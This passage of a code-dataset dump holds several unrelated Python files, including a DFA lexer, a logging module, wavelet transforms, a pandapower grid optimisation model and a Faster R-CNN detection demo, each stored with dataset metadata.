DFA_state:\n                state = DFA_state.index(ch)\n            elif \"a\" in DFA_state:\n                state = 2\n            else:\n                error_message = \"state \" + str(state) + \" cannot accept character \" + ch\n                return (False, error_message)\n\n        if str(state) in self.__final_state:\n            return (True, None)\n        else:\n            error_message = \"the automaton stopped in a non-final state\"\n            return (False, error_message)\n\nclass StringDFA:\n    __stringDFA = None\n    __final_state = None\n    __stringDFA_path = None\n\n    def __init__(self, stringDFA_path):\n        self.__stringDFA_path = stringDFA_path\n        self.__stringDFA, self.__final_state = DFA_converter(stringDFA_path).convert()\n\n    def in_stringDFA(self, program_fraction):\n        state = 0\n\n        for i in range(len(program_fraction)):\n            ch = program_fraction[i]\n            DFA_state = self.__stringDFA[state]\n\n            if ch in DFA_state:\n                state = DFA_state.index(ch)\n            elif \"a\" in DFA_state and ch != \"\\\"\":\n                state = 1\n            else:\n                error_message = \"state \" + str(state) + \" cannot accept character \" + ch\n                return (False, error_message)\n\n        if str(state) in self.__final_state:\n            return (True, None)\n        else:\n            error_message = \"the automaton stopped in a non-final state\"\n            return (False, error_message)\n\nclass CommentDFA:\n    __commentDFA = None\n    __final_state = None\n    __commentDFA_path = None\n\n    def __init__(self, commentDFA_path):\n        self.__commentDFA_path = commentDFA_path\n        self.__commentDFA, self.__final_state = DFA_converter(commentDFA_path).convert()\n\n    def in_commentDFA(self, program_fraction):\n        state = 0\n\n        for i in range(len(program_fraction)):\n            ch = program_fraction[i]\n            DFA_state = self.__commentDFA[state]\n\n            if ch in DFA_state and ch != \"c\" and ch != '#':\n                state = DFA_state.index(ch)\n            elif \"a\" in DFA_state and ch not in [\"/\", \"*\"]:\n                state = DFA_state.index(\"a\")\n            elif \"b\" in DFA_state and ch != \"/\" and ch != \"\\n\":\n                state = DFA_state.index(\"b\")\n            elif \"c\" in DFA_state and ch == \"\\n\":\n                state = DFA_state.index(\"c\")\n            else:\n                error_message = \"state \" + str(state) + \" cannot accept character \" + ch\n                return (False, error_message)\n\n        if str(state) in self.__final_state:\n            return (True, None)\n        else:\n            error_message = \"the automaton stopped in a non-final state\"\n            return (False, error_message)\n\nclass O_H_DFA:\n    __O_H_DFA = None\n    __O_H_DFA_path = None\n    __final_state = None\n\n    def __init__(self, O_H_DFA_path):\n        self.__O_H_DFA_path = O_H_DFA_path\n        self.__O_H_DFA, self.__final_state = DFA_converter(O_H_DFA_path).convert()\n\n    def in_O_H_DFA(self, program_fraction):\n        state = 0\n        is_octal = False\n\n        for i in range(len(program_fraction)):\n            ch = program_fraction[i]\n            DFA_state = self.__O_H_DFA[state]\n            if state == 2:\n                is_octal = True\n\n            if ch in DFA_state:\n                state = DFA_state.index(ch)\n            elif \"a\" in DFA_state and ch >= \"1\" and ch <= \"7\":\n                state = DFA_state.index(\"a\")\n            elif \"b\" in DFA_state and ch >= \"0\" and ch <= \"7\":\n                state = DFA_state.index(\"b\")\n            elif 
\"c\" in DFA_state and ((ch >= \"1\" and ch <= \"9\") or (ch >= \"a\" and ch <= \"f\")):\n state = DFA_state.index(\"c\")\n elif \"d\" in DFA_state and ((ch >= \"0\" and ch <= \"9\") or (ch >= \"a\" and ch <= \"f\")):\n state = DFA_state.index(\"d\")\n else:\n error_masage = \"状态\" + str(state) + \"不能接受字符\" + ch\n return (False, error_masage, is_octal)\n\n if str(state) in self.__final_state:\n return (True, None ,is_octal)\n else:\n error_masage = \"自动机停止状态不再最终状态\"\n return (False, error_masage, is_octal)\n\ndigitDFA = DigitDFA(digitDFA_path)\ncharDFA = CharDFA(charDFA_path)\nstringDFA = StringDFA(stringDFA_path)\ncommentDFA = CommentDFA(commentDFA_path)\no_H_DFA = O_H_DFA(O_H_DFA_path)","sub_path":"Lab1_lexical_analysis/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"121756763","text":"import torch\n\nalphabet = 'ABEKMHOPCTYX' + '0123456789' + '-'\n\nmodel_parameters = {\n 'image_height': 32,\n 'number_input_channels': 1,\n 'number_class_symbols': len(alphabet),\n 'rnn_size': 64\n}\n\n\ndef preds_converter(converter, logits, len_images):\n preds_size = torch.IntTensor([logits.size(0)] * len_images)\n _, preds = logits.max(2)\n preds = preds.transpose(1, 0).contiguous().view(-1)\n sim_preds = converter.decode(preds, preds_size, raw=False)\n return sim_preds, preds_size","sub_path":"project/cnd/ocr/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"525471415","text":"import matplotlib.pyplot as plt\nimport statistics\n#log_file = open('./move_by_v.txt', 'r')\n#log_file = open('./moving_target_no_early_stop_4f+d.txt', 'r')\nlog_file = open('./phys.txt','r')\nlog_file = open('./phys_bigger_queue.txt','r')\nline = log_file.readline()\nx = []\ny = []\naverage = []\nmedian = []\nt = 1000.0\nlast_t = []\ni = 0\navg_len = 0\nwhile line:\n while '[' not in line:\n line = log_file.readline()\n sections = line.split('[')\n info = sections[2][:-2].split()\n \n ep_nb = int(info[1])\n ep_len = int(info[3])\n avg_len += ep_len\n i += 1\n rew = float(info[5])\n\n if len(last_t) < t and ep_len > 1:\n #garbage=1\n x.append(ep_nb)\n last_t.append(rew)\n average.append(sum(last_t)/len(last_t))\n elif ep_len > 1:\n y.append(rew)\n x.append(ep_nb)\n last_t.pop(0)\n last_t.append(rew)\n average.append(sum(last_t)/t)\n# median.append(statistics.median(last_t))\n #except:\n # print\n line = log_file.readline()\nfig, ax = plt.subplots()\nprint('Last 1000 Reward: '+str(sum(last_t)/t))\nprint('Avg Len: '+str(float(avg_len)/float(i)))\n#ax.plot(x, y)\nax.plot(x,average)\n#ax.plot(x, median)\nax.set(xlabel='time', ylabel='dist moved to target')\nax.grid()\nplt.show()\n","sub_path":"ga3c-airsim/graph_results.py","file_name":"graph_results.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"445947633","text":"#!/usr/bin/env python\n\n\"\"\"\nCOSMO TECHNICAL TESTSUITE\n\nThis module implements a logger class which handles messages from the testsuite\nto the user. It is based on the standard Python logger class. 
print('Last 1000 Reward: '+str(sum(last_t)/t))\nprint('Avg Len: '+str(float(avg_len)/float(i)))\n#ax.plot(x, y)\nax.plot(x,average)\n#ax.plot(x, median)\nax.set(xlabel='time', ylabel='dist moved to target')\nax.grid()\nplt.show()\n","sub_path":"ga3c-airsim/graph_results.py","file_name":"graph_results.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"445947633","text":"#!/usr/bin/env python\n\n\"\"\"\nCOSMO TECHNICAL TESTSUITE\n\nThis module implements a logger class which handles messages from the testsuite\nto the user. It is based on the standard Python logger class. The following logging\nlevels are supported: DEBUG, INFO, WARNING, ERROR\n\"\"\"\n\n# built-in modules\nimport sys, string\nimport logging as LG\n\n# private modules\nfrom ts_utilities import status_str, pretty_status_str\n\n# information\n__author__ = \"Oliver Fuhrer\"\n__email__ = \"cosmo-wg6@cosmo.org\"\n__maintainer__ = \"xavier.lapillonne@meteoswiss.ch\"\n\n\n# status column length\nSTAT_COLUMN = 12\n\n# logging levels\nDEBUG = LG.DEBUG # 10\nINFO = LG.INFO # 20\nWARNING = LG.WARNING # 30\nCHCKINFO = 35 # 35\nIMPORTANT = 35 # 35\nERROR = LG.ERROR # 40\n\n# formatting\nFORMAT = {\n    DEBUG : \" \"*(STAT_COLUMN+2-7) + \"[ DBG ] %(msg)s\",\n    INFO : \"%(msg)s\",\n    WARNING : \"*** WARNING: %(msg)s\",\n    CHCKINFO : \"%(msg)s\",\n    IMPORTANT : \"%(msg)s\",\n    ERROR : \"*** ERROR: %(msg)s\"\n}\n\n\nclass MyFormatter(LG.Formatter):\n    \"\"\"Custom formatter which allows different formatting for different levels\"\"\"\n    \n    def __init__(self, fmt=\"%(levelno)s: %(msg)s\"):\n        #super(MyFormatter,self).__init__(fmt)\n        LG.Formatter.__init__(self, fmt)\n\n    def format(self, record):\n\n        # Save the original format configured by the user\n        # when the logger formatter was instantiated\n        format_orig = self._fmt\n\n        # Replace the original format with one customized by logging level\n        self._fmt = FORMAT.get(record.levelno)\n\n        # Call the original formatter class to do the grunt work\n        #result = super(MyFormatter, self).format(record)\n        result = LG.Formatter.format(self, record)\n\n        # Restore the original format configured by the user\n        self._fmt = format_orig\n\n        return result\n\n\nclass Logger:\n    \"\"\"simple logger which is used throughout the testsuite\"\"\"\n\n    def __init__(self, filename, append=False, color=False):\n        self.filename = filename\n        if append:\n            self.mode = 'a'\n        else:\n            self.mode = 'w'\n        self.logger = LG.getLogger('testsuite')\n        if filename:\n            self.handler = LG.FileHandler(filename,mode=self.mode,delay=False)\n        else:\n            self.handler = LG.StreamHandler(sys.stdout)\n        self.formatter = MyFormatter()\n        self.handler.setFormatter(self.formatter)\n        self.logger.addHandler(self.handler)\n        self.logger.setLevel(INFO)\n        self.color = color\n    \n    def __del__(self):\n        LG.shutdown()\n    \n    def setLevel(self, lvl):\n        self.logger.setLevel(lvl)\n    \n    def getLevel(self):\n        return self.logger.getEffectiveLevel()\n\n    def log(self, lvl, msg, *args, **kwargs):\n        self.logger.log(lvl, msg, *args, **kwargs)\n    \n    def debug(self, msg, *args, **kwargs):\n        self.log(DEBUG, msg, *args, **kwargs)\n    \n    def info(self, msg, *args, **kwargs):\n        prefix = ' '*(STAT_COLUMN+2) + ' '\n        self.log(INFO, prefix + msg, *args, **kwargs)\n    \n    def warning(self, msg, *args, **kwargs):\n        self.log(WARNING, msg, *args, **kwargs)\n\n    def chckinfo(self, msg, *args, **kwargs):\n        prefix = ' '*(STAT_COLUMN+4) + ' '\n        self.log(CHCKINFO, prefix + msg, *args, **kwargs)\n    \n    def important(self, msg, *args, **kwargs):\n        prefix = '[' + '-'*STAT_COLUMN + '] '\n        self.log(IMPORTANT, prefix + msg, *args, **kwargs)\n    \n    def result(self, indent, status, msg, *args, **kwargs):\n        slen = len(status_str(status))\n        status = pretty_status_str(status, self.color, indent==0)\n        pad = STAT_COLUMN - slen - 2*indent\n        prefix=' '*(2*indent) + '[' + ' '*(pad//2) + status + ' '*(pad-pad//2) + '] '\n        self.log(IMPORTANT, prefix + msg, *args, **kwargs)\n    \n    def error(self, msg, *args, **kwargs):\n        self.log(ERROR, msg, *args, **kwargs)\n    \n    def flush(self):\n        
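# push any buffered log records out through the handler immediately\n        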
self.handler.flush()\n\n","sub_path":"tools/ts_logger.py","file_name":"ts_logger.py","file_ext":"py","file_size_in_byte":3992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"288199144","text":"from random import randint\ngame = True\nround = True\nwhile game == True:\n\tboard = []\n\tfor i in range(10):\n\t\tboard.append(\"~~~~~~~~~~\")\n\n\tdef printboard():\n\t\tfor row in board:\n\t\t\tprint(row)\n\n\t'''\n\tclass Ship():\n\t\tx = None\n\t\ty = None\n\t\tdef __init__(self, x, y):\n\t\t\tself.x = x\n\t\t\tself.y = y\n\n\tdef make_ship(x, y):\n\t\tship = Ship(x, y)\n\t\treturn ship\n\n\ts1 = make_ship(randint(0, 11), randint(0, 11))\n\t'''\n\n\tshots = []\n\twhile round == True:\n\t\tshot = input(\"where to shoot (x, y): \")\n\t\tshots.append(shot)\n\t\tgame = False\n\t\tround = False\n","sub_path":"programmeerimine/py/battleship.py","file_name":"battleship.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"284008468","text":"import math\r\n\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\n\r\nfrom torch.autograd import Variable\r\nimport models.modules.module_util as mutil\r\nimport functools\r\n\r\ndef default_conv(in_channels, out_channels, kernel_size, bias=True, dilation=1, use_snorm=False):\r\n if use_snorm:\r\n return nn.utils.spectral_norm(nn.Conv2d(\r\n in_channels, out_channels, kernel_size,\r\n padding=(kernel_size//2)+dilation-1, bias=bias, dilation=dilation))\r\n else:\r\n return nn.Conv2d(\r\n in_channels, out_channels, kernel_size,\r\n padding=(kernel_size//2)+dilation-1, bias=bias, dilation=dilation)\r\n\r\ndef dwt_init(x):\r\n\r\n x01 = x[:, :, 0::2, :] / 2\r\n x02 = x[:, :, 1::2, :] / 2\r\n x1 = x01[:, :, :, 0::2]\r\n x2 = x02[:, :, :, 0::2]\r\n x3 = x01[:, :, :, 1::2]\r\n x4 = x02[:, :, :, 1::2]\r\n x_LL = x1 + x2 + x3 + x4\r\n x_HL = -x1 - x2 + x3 + x4\r\n x_LH = -x1 + x2 - x3 + x4\r\n x_HH = x1 - x2 - x3 + x4\r\n\r\n return torch.cat((x_LL, x_HL, x_LH, x_HH), 1)\r\n\r\ndef iwt_init(x):\r\n r = 2\r\n in_batch, in_channel, in_height, in_width = x.size()\r\n #print([in_batch, in_channel, in_height, in_width])\r\n out_batch, out_channel, out_height, out_width = in_batch, int(\r\n in_channel / (r ** 2)), r * in_height, r * in_width\r\n x1 = x[:, 0:out_channel, :, :] / 2\r\n x2 = x[:, out_channel:out_channel * 2, :, :] / 2\r\n x3 = x[:, out_channel * 2:out_channel * 3, :, :] / 2\r\n x4 = x[:, out_channel * 3:out_channel * 4, :, :] / 2\r\n\r\n\r\n h = torch.zeros([out_batch, out_channel, out_height, out_width]).float().cuda()\r\n\r\n h[:, :, 0::2, 0::2] = x1 - x2 - x3 + x4\r\n h[:, :, 1::2, 0::2] = x1 - x2 + x3 - x4\r\n h[:, :, 0::2, 1::2] = x1 + x2 - x3 - x4\r\n h[:, :, 1::2, 1::2] = x1 + x2 + x3 + x4\r\n\r\n return h\r\n\r\nclass DWT(nn.Module):\r\n def __init__(self):\r\n super(DWT, self).__init__()\r\n self.requires_grad = False\r\n\r\n def forward(self, x):\r\n return dwt_init(x)\r\n\r\nclass IWT(nn.Module):\r\n def __init__(self):\r\n super(IWT, self).__init__()\r\n self.requires_grad = False\r\n\r\n def forward(self, x):\r\n return iwt_init(x)\r\n","sub_path":"codes/models/modules/Wavelet.py","file_name":"Wavelet.py","file_ext":"py","file_size_in_byte":2170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"497396589","text":"from boltons.formatutils import DeferredValue, get_format_args\nimport sys\n\nast = \"-\"*8\nprint(ast, 
\"DeferredValue\", ast)\ndv = DeferredValue(lambda: len(sys._current_frames()))\noutput = \"works great in all {0} threads!\".format(dv)\nprint(dv)\nprint(output)\n\n","sub_path":"Modules/boltons_module/formatutils.py","file_name":"formatutils.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"582449162","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 3 15:07:11 2020\n\n@author: Caner\n\"\"\"\nimport warnings\nwarnings.filterwarnings(\"ignore\")\nimport os\nimport pandas as pd\nimport pandapower as pp\nimport matplotlib.pyplot as plt\nimport pandapower.toolbox as tb\nfrom pandapower.plotting import simple_plot, simple_plotly, pf_res_plotly\nimport tempfile\nimport numpy as np\nfrom pandapower.timeseries.data_sources.frame_data import DFData\nfrom pandapower.timeseries.output_writer import OutputWriter\nfrom pandapower.timeseries.run_time_series import run_timeseries\nfrom pandapower.control.controller.const_control import ConstControl\n\nsimulators_dir = r'C:\\Users\\Caner\\Desktop\\Multi-Energy-Systems-Thesis-Project\\Co_simulation\\Case 2'\n\ndef grid_net():\n \n net = pp.create_empty_network()\n \n min_vm_pu = 0.98\n max_vm_pu = 1.02\n \n Pmin_p2g=0\n Pmax_p2g=50\n Pmin_p2h=0\n Pmax_p2h=50\n Pmin_extgrid=-0.1\n Pmax_extgrid=0.1\n Pmax_WF = 100\n Pmax_PV = 100\n Pmin_PV = 0\n Pmin_WF = 0\n\n \n #create buses\n bus1 = pp.create_bus(net, vn_kv=220., min_vm_pu=min_vm_pu, max_vm_pu=max_vm_pu, name ='Bus 0')\n bus2 = pp.create_bus(net, vn_kv=110., min_vm_pu=min_vm_pu, max_vm_pu=max_vm_pu, name ='Bus 1')\n bus3 = pp.create_bus(net, vn_kv=110., min_vm_pu=min_vm_pu, max_vm_pu=max_vm_pu, name ='Bus 2')\n \n #create 220/110 kV transformer\n pp.create_transformer(net, bus1, bus2, std_type=\"100 MVA 220/110 kV\", max_loading_percent=100, parallel=1)\n #pp.create_transformer_from_parameters(net, bus1, bus2, sn_mva=20, vn_hv_kv=110, vn_lv_kv=33, vkr_percent=1, vk_percent=1, pfe_kw=1, i0_percent=1, shift_degree=0, tap_phase_shifter=False, in_service=True, name='Trafo', index=None, max_loading_percent=90, parallel=1, df=1.0)\n \n \n #create 110 kV lines\n pp.create_line(net, bus2, bus3, length_km=10., std_type='NAYY 4x120 SE', max_loading_percent=100)\n \n #create loads\n l1 = pp.create_load(net, bus3, p_mw=50, q_mvar=0, sn_mva=55, min_p_mw=Pmin_p2g,max_p_mw=Pmax_p2g, max_q_mvar=10, min_q_mvar=-10, scaling=1.0, in_service=True, controllable=False,name='Power2Gas',)\n l2 = pp.create_load(net, bus3, p_mw=50, q_mvar=0, sn_mva=55, min_p_mw=Pmin_p2h,max_p_mw=Pmax_p2h, max_q_mvar=10, min_q_mvar=-10, scaling=1.0, in_service=True, controllable=False,name='Power2Heat',)\n l3 = pp.create_load(net, bus3, p_mw=10, q_mvar=0, sn_mva=200, min_p_mw=0,max_p_mw=200, max_q_mvar=50, min_q_mvar=-50, scaling=1.0, in_service=True, controllable=True,name='Electrical')\n l4 = pp.create_load(net, bus3, p_mw=20, q_mvar=0, sn_mva=20, min_p_mw=0,max_p_mw=20, max_q_mvar=20, min_q_mvar=-20, scaling=1.0, in_service=True, controllable=False,name='Electrical_base')\n \n #create generators\n eg = pp.create_ext_grid(net, bus1,vm_pu=1.0, va_degree=0,min_p_mw=Pmin_extgrid, max_p_mw=Pmax_extgrid, name='external_grid')\n g0 = pp.create_sgen (net, bus3, p_mw=56, q_mvar=0, sn_mva=110, name='WF', max_q_mvar=80, min_q_mvar=-80, min_p_mw=Pmin_WF, max_p_mw=Pmax_WF, scaling=1.0, type=None, controllable=False, in_service=True)\n g1 = pp.create_sgen(net, bus3, p_mw=0, q_mvar=0, sn_mva=110, name='PV', max_q_mvar=80, min_q_mvar=-80, 
min_p_mw=Pmin_PV, max_p_mw=Pmax_PV, scaling=1.0, type=None, controllable=False, in_service=True)\n g2 = pp.create_sgen(net, bus3, p_mw=30, q_mvar=0, sn_mva=200, name='grid', max_q_mvar=80, min_q_mvar=-80, min_p_mw=0, max_p_mw=220, scaling=1.0, type=None, controllable=True, in_service=True)\n \n pp.create_poly_cost(net, 0, 'load', cp1_eur_per_mw=-14)\n pp.create_poly_cost(net, 1, 'load', cp1_eur_per_mw=-12)\n pp.create_poly_cost(net, 2, 'load', cp1_eur_per_mw=-3)\n #pp.create_poly_cost(net,0,'ext_grid',cp1_eur_per_mw=20) \n pp.create_poly_cost(net, 0, 'sgen', cp1_eur_per_mw=-1)\n pp.create_poly_cost(net, 1, 'sgen', cp1_eur_per_mw=-1)\n pp.create_poly_cost(net, 2, 'sgen', cp1_eur_per_mw=2)\n \n pp.runopp(net, calculate_voltage_angles=False, verbose=True)\n return net\n\nnet = grid_net()\n\n #costeg = pp.create_poly_cost(net, 0, 'ext_grid', cp1_eur_per_mw=10)\n #costgen1 = pp.create_poly_cost(net, 0, 'gen', cp1_eur_per_mw=10)\n #costgen2 = pp.create_poly_cost(net, 1, 'gen', cp1_eur_per_mw=10)\n \n #Maximizing Generation\n#pp.create_poly_cost(net,0,'ext_grid',cp1_eur_per_mw=20) \n\n#pp.create_pwl_cost(net, 1, \"sgen\", [[net.sgen.min_p_mw.at[0], net.sgen.max_p_mw.at[0], -1]])\n\n#pp.create_pwl_cost(net, 0, \"sgen\", [[net.sgen.min_p_mw.at[0], net.sgen.max_p_mw.at[0], -1]])\n \n #Minimizing Load\n#pp.create_poly_cost(net, 0, 'load', cp1_eur_per_mw=1)\n#pp.create_poly_cost(net, 1, 'load', cp1_eur_per_mw=-14)\n\n\n#pp.create_poly_cost(net, 2, 'load', cp1_eur_per_mw=-2)\n #pp.create_pwl_cost(net, 0, \"load\", [[net.load.min_p_mw.at[0], net.load.max_p_mw.at[0], 1]])\n #pp.create_poly_cost(net, 0, 'storage', cp1_eur_per_mw=1)\n #pp.create_pwl_cost(net, 0, \"storage\", [[net.storage.min_p_mw.at[0], net.storage.max_p_mw.at[0], 1]])\n\n#pp.runopp(net, calculate_voltage_angles=False, verbose=True)\n#pp.runpp(net)\n#if __name__ == \"__main__\":\n# pp.diagnostic(net)\n\n#df = pd.read_excel(\"multi_timeseries.xlsx\",index_col=0)\n#ds = DFData(df)\n#ConstControl(net, 'sgen',\"max_p_mw\", element_index=net.sgen.index, data_source=ds, profile_name=[\"Wind\",\"PV\"])\n\n#ow = OutputWriter(net, time_steps=None, output_path=\"./results/\", output_file_type=\".xlsx\")\n#ow.log_variable(\"res_sgen\",\"p_mw\")\n#ow.log_variable(\"res_line\",\"loading_percent\")\n# starting the timeseries simulation \n#run_timeseries(net, time_steps=None)\n\n#Results\n#df = pd.read_excel(\"./results/res_sgen/max_p_mw.xlsx\",index_col=0)\n#df.plot()\n#plt.show()\n\n\n\n\n\n# save as pickle\npp.to_pickle(net, os.path.join(simulators_dir, 'gridModel_case2.p')) # absolute path\n\nprint(net.res_bus)\nprint(net.res_sgen)\nprint(net.res_load)\nprint(net.res_ext_grid)\nprint(net.res_line)\n\n#simple_plot(net)\n","sub_path":"Co_simulation/Base_case1/grid_basecase.py","file_name":"grid_basecase.py","file_ext":"py","file_size_in_byte":5901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"231728716","text":"from __future__ import print_function\nimport argparse\nimport os\nimport cv2\nimport json\nimport mxnet as mx\nimport numpy as np\nfrom rcnn.config import config\nimport rcnn.symbol\nfrom rcnn.io.image import resize, transform\nfrom rcnn.core.tester import Predictor, im_detect, im_proposal, vis_all_detection, draw_all_detection\nfrom rcnn.utils.load_model import load_param\nfrom rcnn.processing.nms import py_nms_wrapper, cpu_nms_wrapper, gpu_nms_wrapper\n\n\nCLASSES = ('__background__',\n 'aeroplane', 'bicycle', 'bird', 'boat',\n 'bottle', 'bus', 'car', 'cat', 'chair',\n 'cow', 
'diningtable', 'dog', 'horse',\n 'motorbike', 'person', 'pottedplant',\n 'sheep', 'sofa', 'train', 'tvmonitor')\n\nconfig.TEST.HAS_RPN = True\nSHORT_SIDE = config.SCALES[0][0]\nLONG_SIDE = config.SCALES[0][1]\nPIXEL_MEANS = config.PIXEL_MEANS\nDATA_NAMES = ['data', 'im_info']\nLABEL_NAMES = None\nDATA_SHAPES = [('data', (1, 3, LONG_SIDE, SHORT_SIDE)), ('im_info', (1, 3))]\nLABEL_SHAPES = None\n# visualization\nCONF_THRESH = 0.7\nNMS_THRESH = 0.3\nnms = py_nms_wrapper(NMS_THRESH)\n\n\ndef get_net(symbol, prefix, epoch, ctx):\n arg_params, aux_params = load_param(\n prefix, epoch, convert=True, ctx=ctx, process=True)\n\n # infer shape\n data_shape_dict = dict(DATA_SHAPES)\n print('DATA_SHAPES:',DATA_SHAPES)\n arg_names, aux_names = symbol.list_arguments(), symbol.list_auxiliary_states()\n arg_shape, _, aux_shape = symbol.infer_shape(**data_shape_dict)\n arg_shape_dict = dict(zip(arg_names, arg_shape))\n aux_shape_dict = dict(zip(aux_names, aux_shape))\n\n # check shapes\n for k in symbol.list_arguments():\n if k in data_shape_dict or 'label' in k:\n continue\n assert k in arg_params, k + ' not initialized'\n assert arg_params[k].shape == arg_shape_dict[k], \\\n 'shape inconsistent for ' + k + ' inferred ' + \\\n str(arg_shape_dict[k]) + ' provided ' + str(arg_params[k].shape)\n for k in symbol.list_auxiliary_states():\n assert k in aux_params, k + ' not initialized'\n assert aux_params[k].shape == aux_shape_dict[k], \\\n 'shape inconsistent for ' + k + ' inferred ' + \\\n str(aux_shape_dict[k]) + ' provided ' + str(aux_params[k].shape)\n\n predictor = Predictor(symbol, DATA_NAMES, LABEL_NAMES, context=ctx,\n provide_data=DATA_SHAPES, provide_label=LABEL_SHAPES,\n arg_params=arg_params, aux_params=aux_params)\n return predictor\n\n\ndef generate_batch(im):\n \"\"\"\n preprocess image, return batch\n :param im: cv2.imread returns [height, width, channel] in BGR\n :return:\n data_batch: MXNet input batch\n data_names: names in data_batch\n im_scale: float number\n \"\"\"\n im_array, im_scale = resize(im, SHORT_SIDE, LONG_SIDE)\n im_array = transform(im_array, PIXEL_MEANS)\n im_info = np.array(\n [[im_array.shape[2], im_array.shape[3], im_scale]], dtype=np.float32)\n data = [mx.nd.array(im_array), mx.nd.array(im_info)]\n data_shapes = [('data', im_array.shape), ('im_info', im_info.shape)]\n data_batch = mx.io.DataBatch(\n data=data, label=None, provide_data=data_shapes, provide_label=None)\n return data_batch, DATA_NAMES, im_scale\n\n\ndef demo_net(predictor, image_name, vis=False, save_dir='./', save_name='tmp.jpg', threshold=0.7):\n \"\"\"\n generate data_batch -> im_detect -> post process\n :param predictor: Predictor\n :param image_name: image name\n :param vis: will save as a new image if not visualized\n :return: None\n \"\"\"\n assert os.path.exists(image_name), image_name + ' not found'\n result_lst = list()\n try:\n im = cv2.imread(image_name)\n data_batch, data_names, im_scale = generate_batch(im)\n scores, boxes, data_dict = im_detect(\n predictor, data_batch, data_names, im_scale)\n\n all_boxes = [[] for _ in CLASSES]\n for cls in CLASSES:\n cls_ind = CLASSES.index(cls)\n cls_boxes = boxes[:, 4 * cls_ind:4 * (cls_ind + 1)]\n cls_scores = scores[:, cls_ind, np.newaxis]\n keep = np.where(cls_scores >= threshold)[0]\n dets = np.hstack((cls_boxes, cls_scores)).astype(np.float32)[keep, :]\n keep = nms(dets)\n all_boxes[cls_ind] = dets[keep, :]\n\n boxes_this_image = [[]] + [all_boxes[j] for j in range(1, len(CLASSES))]\n\n except:\n print('detection error')\n return None\n\n # print 
results\n print('class ---- [[x1, y1, x2, y2, confidence]]')\n for ind, boxes in enumerate(boxes_this_image):\n if len(boxes) > 0:\n print('---------', CLASSES[ind], '---------')\n print(boxes)\n for box in boxes:\n tmp_box = [round(x, 6) for x in box.tolist()[:]]\n tmp_box.append(str(CLASSES[ind]))\n result_lst.append(tmp_box)\n if vis:\n vis_all_detection(data_dict['data'].asnumpy(),\n boxes_this_image, CLASSES, im_scale)\n else:\n # result_dir = os.path.dirname(image_name)\n # result_file = save_dir + os.path.basename(image_name)\n result_file = save_dir + save_name\n print('results saved to %s' % result_file)\n im = draw_all_detection(\n data_dict['data'].asnumpy(), boxes_this_image, CLASSES, im_scale)\n if not os.path.exists(os.path.dirname(result_file)):\n os.system('mkdir -p '+os.path.dirname(result_file))\n cv2.imwrite(result_file, im)\n\n return result_lst\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(\n description='Demonstrate a Faster R-CNN network')\n parser.add_argument('--network', help='custom network architecture', default='resnet', type=str)\n parser.add_argument('--labellist', help='custom label list', type=str)\n parser.add_argument('--image', help='custom image', type=str)\n parser.add_argument('--imagelist', help='custom image list', type=str)\n parser.add_argument('--imageprefix', help='custom image prefix', type=str)\n parser.add_argument('--savedir', help='custom saving directory', type=str)\n parser.add_argument('--prefix', help='saved model prefix', type=str)\n parser.add_argument('--epoch', help='epoch of pretrained model', type=int)\n parser.add_argument('--longside', help='max long side of resized image', default=1500, type=int)\n parser.add_argument('--shortside', help='short side of resized image', default=800, type=int)\n parser.add_argument('--threshold', help='score threshold', default=CONF_THRESH, type=float)\n parser.add_argument('--gpu', help='GPU device to use', default=0, type=int)\n parser.add_argument('--vis', help='display result', action='store_true')\n parser.add_argument('--test', help='single image test mode', action='store_true')\n parser.add_argument('--save_json', help='path to result json file', default='./tmp.json', type=str)\n args = parser.parse_args()\n return args\n\n\ndef main(args):\n global CLASSES, DATA_SHAPES, SHORT_SIDE, LONG_SIDE\n SHORT_SIDE, LONG_SIDE = args.shortside, args.longside\n DATA_SHAPES = [('data', (1, 3, LONG_SIDE, SHORT_SIDE)), ('im_info', (1, 3))]\n # args = parse_args()\n ctx = mx.gpu(args.gpu)\n CLASSES = ['__background__']\n with open(args.labellist, 'r') as label_list:\n for label in label_list:\n CLASSES.append(label.strip())\n SHORT_SIDE, LONG_SIDE = args.shortside, args.longside\n DATA_SHAPES = [('data', (1, 3, LONG_SIDE, SHORT_SIDE)), ('im_info', (1, 3))]\n # print(CLASSES)\n # symbol = eval('rcnn.symbol.get_' + args.network + '_test')(num_classes=config.NUM_CLASSES, num_anchors=config.NUM_ANCHORS)\n symbol = eval('rcnn.symbol.get_' + args.network + '_test')(num_classes=len(CLASSES), num_anchors=config.NUM_ANCHORS)\n # symbol.save('demo.py.json')\n # symbol = rcnn.symbol.get_resnet_test(\n # num_classes=len(CLASSES), num_anchors=config.NUM_ANCHORS)\n predictor = get_net(symbol, args.prefix, args.epoch, ctx)\n lst_img = open(args.imagelist, 'r')\n result_dic = dict()\n for img in lst_img:\n print('processing: ' + img.strip())\n tmp = demo_net(predictor, args.imageprefix +\n img.strip(), args.vis, save_dir=args.savedir, save_name=img.strip(), threshold=args.threshold)\n # if tmp:\n 
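# store an entry even when detection failed (tmp is None) so the JSON covers every image\n        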
